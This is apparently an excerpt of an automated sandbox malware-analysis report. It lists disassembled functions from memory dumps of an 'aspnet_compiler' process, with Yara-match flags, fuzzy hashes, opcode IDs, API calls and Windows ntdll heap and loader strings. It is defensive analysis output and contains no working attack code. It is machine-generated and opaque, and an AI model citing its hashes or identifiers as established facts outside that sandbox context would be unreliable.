                                                                                                        • Opcode Fuzzy Hash: 11ee6f4fe670e68b04c4fbcf4560fcc96f2033ae1d980ac49e5d81d080f95a0c
                                                                                                        • Instruction Fuzzy Hash: 9DE06D723002047BD610EF99EC41F9B73ADDFC9720F408519F908A7241C675B910C6B9
                                                                                                        Function 0042CFF3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 241 42cff3-42d034 call 404823 call 42df33 RtlAllocateHeap
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,0041EB84,?,?,00000000,?,0041EB84,?,?,?), ref: 0042D02F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: c052594ec9451208ac238e65e670723ed15c2a3c5389a19f5b1804f41d85aef9
                                                                                                        • Instruction ID: 5aafb5bf99cf7b85361f7cf0f29e87630ba68715cb247dc619dd34e5fcffa16e
                                                                                                        • Opcode Fuzzy Hash: c052594ec9451208ac238e65e670723ed15c2a3c5389a19f5b1804f41d85aef9
                                                                                                        • Instruction Fuzzy Hash: 50E092B23042047BD610EE99EC41F9B77ACEFC9720F004419F909A7281D674BD10CBB9
                                                                                                        Function 0042D093 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 256 42d093-42d0cc call 404823 call 42df33 ExitProcess
                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,08B1C329,?,?,08B1C329), ref: 0042D0C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: 81a70780636273e7d5fe1c559f2d7e3829b7786afc4aba70b6f6ed2a0cb8b7f7
                                                                                                        • Instruction ID: 17e87a107ee5de199702f9ac3fe3e7a34ec13c6b535e46ac0ffacb1157400cd0
                                                                                                        • Opcode Fuzzy Hash: 81a70780636273e7d5fe1c559f2d7e3829b7786afc4aba70b6f6ed2a0cb8b7f7
                                                                                                        • Instruction Fuzzy Hash: 7AE086366002547BD110FB5ADC41FDB776CDFC5714F41442AFA0967185C6757A1187F4
                                                                                                        Function 017C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 261 17c2c0a-17c2c0f 262 17c2c1f-17c2c26 LdrInitializeThunk 261->262 263 17c2c11-17c2c18 261->263
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 5a46c9d038f7bae6bb0e4cb440c6694b35962461c4882f32078c457bdc23ed93
                                                                                                        • Instruction ID: 791e242b2d8a26b1bdefd92cfa5e5927cd533114fa27ab0d4880fa283195f9a4
                                                                                                        • Opcode Fuzzy Hash: 5a46c9d038f7bae6bb0e4cb440c6694b35962461c4882f32078c457bdc23ed93
                                                                                                        • Instruction Fuzzy Hash: 9CB09B719055D5C5DB11E7644608717B91077D0701F15C075D2030651F4738C1D1E277

                                                                                                        Non-executed Functions

                                                                                                        Function 01802349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2160512332
                                                                                                        • Opcode ID: 43e2b45f384bdbf5de74d172e514dbc133924871abbb87573a497f0c7b62cdee
                                                                                                        • Instruction ID: ab2adad0e83b9a25df91a57a8beba6ee7856c7d7dc482e481e160663fb2a1ce0
                                                                                                        • Opcode Fuzzy Hash: 43e2b45f384bdbf5de74d172e514dbc133924871abbb87573a497f0c7b62cdee
                                                                                                        • Instruction Fuzzy Hash: 7B92C17160474AAFE762CF18CC88B6BB7E9BB84714F04481DFA94D7291D7B0EA44CB52
                                                                                                        Function 018312ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                        • API String ID: 0-3591852110
                                                                                                        • Opcode ID: fc2e2d402e2f388ca4fec267c145d4330474e9c15b50413955e218899a1552ee
                                                                                                        • Instruction ID: 258631b5038fd7604ad51a75b053558989a57cec36396cb2d1d8ac4b98c4d6eb
                                                                                                        • Opcode Fuzzy Hash: fc2e2d402e2f388ca4fec267c145d4330474e9c15b50413955e218899a1552ee
                                                                                                        • Instruction Fuzzy Hash: CB12CE70600646DFDB268F29C499BB6BBF1FF49B04F1C8459E496CB641E734EA81CB90
                                                                                                        Function 0177D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                        • API String ID: 0-3532704233
                                                                                                        • Opcode ID: 72d3bb1197f9bae628ac93a12b002ed6216ac846b781f2f5c82ce7f463e4883c
                                                                                                        • Instruction ID: 983b06fdb31ce72ca9ada019f2e91b2d1d47a4bf2b0661c08b789d3bfd4a68d2
                                                                                                        • Opcode Fuzzy Hash: 72d3bb1197f9bae628ac93a12b002ed6216ac846b781f2f5c82ce7f463e4883c
                                                                                                        • Instruction Fuzzy Hash: BBB19D725083569FDB22DF68C480A6BFBE8BF88754F05492EF989D7240E770D944CB92
                                                                                                        Function 01819179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                        • API String ID: 0-3063724069
                                                                                                        • Opcode ID: dc8c7a1d2e61ddbdebd9f9ba1780b4281973adc45f845c0ec1d30aa932a2ba27
                                                                                                        • Instruction ID: 41c05439bc4630c8ff212a79e4b040e58635a7e4cc7beabcd1c693db3ce653a8
                                                                                                        • Opcode Fuzzy Hash: dc8c7a1d2e61ddbdebd9f9ba1780b4281973adc45f845c0ec1d30aa932a2ba27
                                                                                                        • Instruction Fuzzy Hash: 3DD10473C04312ABD721DA58C854BABFBECAF94B18F440A2DFA84E7155D770DA44C7A2
                                                                                                        Function 01830274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                        • API String ID: 0-1700792311
                                                                                                        • Opcode ID: 1a0a574d4b3b03c0ac18a6db4f511a085da455ad4d74f600132642ebeabbccdc
                                                                                                        • Instruction ID: 4bb9792a6d26f52fbe47997a7d7274587cacff1102dc4d614aecb3903bc66d38
                                                                                                        • Opcode Fuzzy Hash: 1a0a574d4b3b03c0ac18a6db4f511a085da455ad4d74f600132642ebeabbccdc
                                                                                                        • Instruction Fuzzy Hash: EED1CC3160468ADFDB22DF68C854AAAFBF1FF89714F188059F445DB252D734DA81CB90
                                                                                                        Function 0177D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 0177D196
                                                                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0177D146
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0177D2C3
                                                                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0177D262
                                                                                                        • @, xrefs: 0177D2AF
                                                                                                        • @, xrefs: 0177D0FD
                                                                                                        • @, xrefs: 0177D313
                                                                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0177D0CF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                        • API String ID: 0-1356375266
                                                                                                        • Opcode ID: bf10c46ff3b3a1130f8285b87d457246755931431a405c6ff3f26f1521fde6d8
                                                                                                        • Instruction ID: 4b0b1eb4a115d816e1128fb91c9d641ca5c5d42a123d9a3820499aaeb4828c62
                                                                                                        • Opcode Fuzzy Hash: bf10c46ff3b3a1130f8285b87d457246755931431a405c6ff3f26f1521fde6d8
                                                                                                        • Instruction Fuzzy Hash: FAA16CB19083469FD721DF65C484B9BFBE8BF84725F00492EEA8897241E774D948CB93
                                                                                                        Function 0177F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-523794902
                                                                                                        • Opcode ID: 35eba07ac0730f5cf915313b0abda11f1df51cd3c9d2ebb9a90e32ee0e6e0fd3
                                                                                                        • Instruction ID: 1026daab376abf476407399dc418027dd7b1a19f469784702f4e7245d116f246
                                                                                                        • Opcode Fuzzy Hash: 35eba07ac0730f5cf915313b0abda11f1df51cd3c9d2ebb9a90e32ee0e6e0fd3
                                                                                                        • Instruction Fuzzy Hash: BE42F071208786CFDB15DF28C984B6AFBE5FF88304F1849ADE4A58B252DB30D945CB52
                                                                                                        Function 0179B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                        • API String ID: 0-122214566
                                                                                                        • Opcode ID: fb5016f23a2c87e943f07f8a5a1b587ebb8574b0022110c2b7e12016b0a6ab84
                                                                                                        • Instruction ID: 840f455f4c42b8795f8cb7e2ba49444ef9325d8053f1e54ddfeb6d067e76368c
                                                                                                        • Opcode Fuzzy Hash: fb5016f23a2c87e943f07f8a5a1b587ebb8574b0022110c2b7e12016b0a6ab84
                                                                                                        • Instruction Fuzzy Hash: FFC14731A04216ABDF25CF68E894F7EFBA5EF45710F1441ADED029B291E770C948D392
                                                                                                        Function 017B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-792281065
                                                                                                        • Opcode ID: 276c5e7658edfe46d9cf7d85936b6cef7a213b81fc7b94e26c4edfd571f8703c
                                                                                                        • Instruction ID: 813fcc810bba569348adec0e082e8f030304ed4945565e159d94613dae6f09a3
                                                                                                        • Opcode Fuzzy Hash: 276c5e7658edfe46d9cf7d85936b6cef7a213b81fc7b94e26c4edfd571f8703c
                                                                                                        • Instruction Fuzzy Hash: 88912670A017159BEB25DF58D888BABFBA5BB40B24F14017CEB01AB385D7789A01DB91
                                                                                                        Function 0182F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                        • API String ID: 0-1745908468
                                                                                                        • Opcode ID: e5d8b50410a03ba513b5fb5ced3a0084664d898d543ac7b117fbe4adb368c32d
                                                                                                        • Instruction ID: 8ffe3c7a18d097c70a93c1bd9db58dd507be711d608cade2bbba7f917a006fd8
                                                                                                        • Opcode Fuzzy Hash: e5d8b50410a03ba513b5fb5ced3a0084664d898d543ac7b117fbe4adb368c32d
                                                                                                        • Instruction Fuzzy Hash: D1910E31A006A5DFDB22DFA8C444AADFBF2FF59714F18801DE655EB261CB759A80CB10
                                                                                                        Function 0177645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • apphelp.dll, xrefs: 01776496
                                                                                                        • LdrpInitShimEngine, xrefs: 017D99F4, 017D9A07, 017D9A30
                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017D9A01
                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017D99ED
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017D9A11, 017D9A3A
                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017D9A2A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-204845295
                                                                                                        • Opcode ID: 28ad2c2da9e65ac113d7dab1ab1a097a4dd7adcd07c7048ea538648e8cedc9cb
                                                                                                        • Instruction ID: 9beb36266af7b17f6ebb45ff8c53a0c2f05b6c8b079eba32356364f4ef49a8db
                                                                                                        • Opcode Fuzzy Hash: 28ad2c2da9e65ac113d7dab1ab1a097a4dd7adcd07c7048ea538648e8cedc9cb
                                                                                                        • Instruction Fuzzy Hash: 0351C3712087059FEB20DF24D855BABF7E8FB84648F10091DFA8597165D730EA04DB93
                                                                                                        Function 017AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017F02BD
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017F02E7
                                                                                                        • RTL: Re-Waiting, xrefs: 017F031E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: 2697b80cf4afce6e82e020453707f873d54368a8c1a7abe875d7b6b9c49f5635
                                                                                                        • Instruction ID: 65364d4350ff1104b4d2eb9d5a0379f4a60b720121ef4f2ce77749e343a8fd86
                                                                                                        • Opcode Fuzzy Hash: 2697b80cf4afce6e82e020453707f873d54368a8c1a7abe875d7b6b9c49f5635
                                                                                                        • Instruction Fuzzy Hash: 32E19A706087429FE725CF28C884B2AFBE1AB84314F544A6DF6A5CB3E2D774D944CB52
                                                                                                        Function 017A51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 017A527B
                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 017A5352
                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 017A542B
                                                                                                        • WindowsExcludedProcs, xrefs: 017A522A
                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 017A5247
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                        • API String ID: 0-258546922
                                                                                                        • Opcode ID: fd58dc2aa244c9092a95771523823df82a2d6cdec5cba120fca1371a91f6d23d
                                                                                                        • Instruction ID: a2166755376e1592be40f8055c12079b495b084dc25f7aeded993906e7493914
                                                                                                        • Opcode Fuzzy Hash: fd58dc2aa244c9092a95771523823df82a2d6cdec5cba120fca1371a91f6d23d
                                                                                                        • Instruction Fuzzy Hash: C0F14A72D00619EFCF12DFA8C984AEEFBF9FF98610F55416AE505E7250E6709E018B90
                                                                                                        Function 017C096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 017C2DF0: LdrInitializeThunk.NTDLL ref: 017C2DFA
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0BA3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0BB6
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0D60
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 1404860816-0
                                                                                                        • Opcode ID: 5510b00916817b311ca548b5852d9c1fafafeb808036fd581163a20e7a13110d
                                                                                                        • Instruction ID: 63c7f7dfc6d42f6f732debe326e169963f8cffe21faba754fdb1a40f7ef6dd55
                                                                                                        • Opcode Fuzzy Hash: 5510b00916817b311ca548b5852d9c1fafafeb808036fd581163a20e7a13110d
                                                                                                        • Instruction Fuzzy Hash: 2F425A75900715DFDB21CF28C884BAAB7F4BF48714F1445ADEA899B245E770AA84CFA0
                                                                                                        Function 017970C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                        • API String ID: 0-3178619729
                                                                                                        • Opcode ID: 871c33c45e221ab33b312ba94772e38f8ab506e2e8a043c5e598191657b28955
                                                                                                        • Instruction ID: 821d26d31ef166b9a905742249215a4ea06c90e4423e97fdb801cfc2052ee2b0
                                                                                                        • Opcode Fuzzy Hash: 871c33c45e221ab33b312ba94772e38f8ab506e2e8a043c5e598191657b28955
                                                                                                        • Instruction Fuzzy Hash: E4139D70A00659CFDF29CF68D480BA9FBB1FF49304F1481A9D949AB386D734A949CF91
                                                                                                        Function 01791070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-3570731704
                                                                                                        • Opcode ID: 386738b90a2679be7e6233183ce11a44a1289de97cab654ec5a1e86132670ee3
                                                                                                        • Instruction ID: 856624654a54f9a3cd9b72cfa0c8681fc41ce543f3ae5b84ca6ea7ef7ae786c3
                                                                                                        • Opcode Fuzzy Hash: 386738b90a2679be7e6233183ce11a44a1289de97cab654ec5a1e86132670ee3
                                                                                                        • Instruction Fuzzy Hash: 59925875A0022ACFEF25CB18D844BA9F7F5BF49324F0581EAD949AB291D7309E84CF51
                                                                                                        Function 0178A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                        • API String ID: 0-379654539
                                                                                                        • Opcode ID: 24e330ec82fa99a8433c3a8ee3e8a2e8596f5dbe47c328b8dd8fb2593ae8dc5c
                                                                                                        • Instruction ID: 1bea070513b74c50c4ac217665a33d77964805eaf542a23fe0e7e6bbbf3c8f3d
                                                                                                        • Opcode Fuzzy Hash: 24e330ec82fa99a8433c3a8ee3e8a2e8596f5dbe47c328b8dd8fb2593ae8dc5c
                                                                                                        • Instruction Fuzzy Hash: AFC17B74148382CFDB11EF58C044B6AF7E4BF88704F04496AF999CB251E738DA89CB62
                                                                                                        Function 017B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • @, xrefs: 017B8591
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017B8421
                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017B855E
                                                                                                        • LdrpInitializeProcess, xrefs: 017B8422
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1918872054
                                                                                                        • Opcode ID: 3cdd0c77a1a96b2b0bcbab9d7f2d1f04d130039a26fa879f4687484ec52b77b0
                                                                                                        • Instruction ID: 81ab261fa39c02e201d0523fbe393bdc1a7431916ba3d0ff5cf949f4c6232c66
                                                                                                        • Opcode Fuzzy Hash: 3cdd0c77a1a96b2b0bcbab9d7f2d1f04d130039a26fa879f4687484ec52b77b0
